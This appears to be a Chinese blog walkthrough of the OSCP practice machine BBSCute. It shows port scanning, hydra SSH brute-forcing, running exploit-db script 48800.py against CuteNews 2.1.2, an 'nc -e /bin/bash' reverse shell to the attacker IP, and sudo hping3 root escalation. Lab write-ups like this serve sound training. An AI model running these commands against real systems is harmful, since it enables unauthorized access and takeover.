统计
  • 建站日期:2021-03-10
  • 文章总数:114 篇
  • 评论总数:0 条
  • 分类总数:12 个
  • 最后更新:4月29日
文章 渗透测试

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权 ------打靶经验分享

自由子
首页 渗透测试 正文

OSCP靶机-------BBSCute

今天来打一个OSCP的靶机,难度中等,花了我半天的时间,包含了端口探测,服务探测,ssh爆破,nc反弹shell,sudo提权等等…靶场难度中等,需要收集两个flag,一个flag低权限shell就可以获取,第二个要提权后才可以获取。希望大家看完可以有所收获。

启动环境:

启动VPN:openvpn universal.ovpn

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第1
张图片
攻击机IP为:192.168.45.193
启动目标靶机:

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第2
张图片
目标靶机IP为: 192.168.164.128

信息收集

1.端口
nmap扫描端口:
nmap --min-rate 10000 -p- 192.168.164.128

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第3
张图片
探测到了:22、80、88、110、995端口
端口服务探测:
nmap -p 22,80,88,110,995 -sV 192.168.164.128

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第4
张图片
探测到各端口对应服务为:
22-open-openssh 7.9p1
80-open-http
88-open-http
110-open-pop3
995-open-ssl/pop3

2.端口测试
2.122-SSH端口
发现22端口是ssh服务,且版本为OpenSSH 7.9p1 Debian,可以搜一下有没有对应的利用脚本。
msfconsole
searchsploit openssh 7.9

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第5
张图片
莫有。
手工弱口令登一下试试。
ssh root@192.168.164.128 -p 22

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第6
张图片
试了还是没有弱口令登录成功,直接ssh爆破,字典选一本msf的,线程为6。
hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 -vV 192.168.164.128 ssh -s 22

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第7
张图片

等待ing,没有爆破出来。

2.280-http
80端口老规矩直接访问一下192.168.164.128:80

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第8
张图片
apache2 的页面,curl看一下源码
curl http://192.168.164.128:80

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第9
张图片
没有什么东西。dirsearch扫一下目录。
dirsearch -u http://192.168.164.128:80

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第10
张图片
还是有很多的,有登录界面?那就看一下Index.php

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第11
张图片
试了下弱口令和SQL注入好像都不行,看一下cms
whatweb http://192.168.164.128/index.php

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第12
张图片
cms是cutenews。看一下具体版本。
curl http://192.168.164.128/index.php

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第13
张图片

有了具体版本,等下直接msf搜exp。

2.388-http
访问一下看看

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第14
张图片
看了一下,啥都没有呀。直接用80的开打吧。

攻击阶段

刚才得到的cms:cutenews 2.1.2
msf直接搜exp
msfconsole
searchsploit cutenews 2.1.2

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第15
张图片
看到有rce就直接用了。选4。把exp拷贝出来。
cp /usr/share/exploitdb/exploits/php/webapps/48800.py exp

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第16
张图片
查看使用信息
cat /usr/share/exploitdb/exploits/php/webapps/48800.py
从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第17
张图片
就是运行后填上IP跟着走就对了。搞起来。
python3 48800.py
输入url: http://192.168.164.128:80

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第18
张图片
怎么直接寄了。可能得修改exp,看看分析分析。
cat 48800.py

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第19
张图片
看到这里就懂了,它这里的URL里面多了/CuteNews,我们的是直接加的index.php,所以要修改一下。看一下有几个地方存在这个问题:
grep CuteNews 48800.py

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第20
张图片
这vim修改真的过于逆天,不想vim修改的话有个小技巧,直接用sed 将所有的 “CuteNews/” 替换为空字符串
sed -i 's:CuteNews/::g' 48800.py
grep CuteNews 48800.py

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第21
张图片
没有了,现在重新开打。

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第22
张图片
拿到shell了!

内网渗透

现在的shell是利用python的exp获取的,我们获取本地的shell会更方便一点,用nc反弹一下。
攻击机nc创建监听端口。
nc -lvvp 1234

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第23
张图片

目标shel输入反弹shell
nc -e /bin/bash 192.168.45.193 1234

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第24
张图片
反弹获取的shell交互不友好,利用python创建一个稳定的shell
python -c "import pty;pty.spawn('/bin/bash')";

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第25
张图片
获取flag1:
find / -name local.txt

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第26
张图片
cat /var/www/local.txt

从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第27
张图片

提权

  1. -sudo提权
    sudo -l
    
从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第28
张图片
    可以看到hping3有root权限。
    访问 https://gtfobins.github.io 寻找
    
从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第29
张图片
    
从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第30
张图片
    hping3
    输入就直接是root了,666
    
从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第31
张图片
    查找flag2
    cat /root/proof.txt
    
从WEB到内网&&信息收集&&SSH爆破&&SUDO提权------打靶经验分享
-纵横安全网-渗透测试-软件开发-前端开发-PHP全栈
-第32
张图片
    完结


扫描二维码,在手机上阅读

版权说明
文章采用: 《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权。
版权声明:未标注转载均为本站原创,转载时请以链接形式注明文章出处。如有侵权、不妥之处,请联系站长删除。敬请谅解!

-- 展开阅读全文 --
渗透测试中的10个常见误区
« 上一篇
金山WPS Office再曝0day 未公开远程命令执行漏洞
下一篇 »
为了防止灌水评论,登录后即可评论!

HI ! 请登录
注册会员,享受下载全站资源特权。

最新评论

标签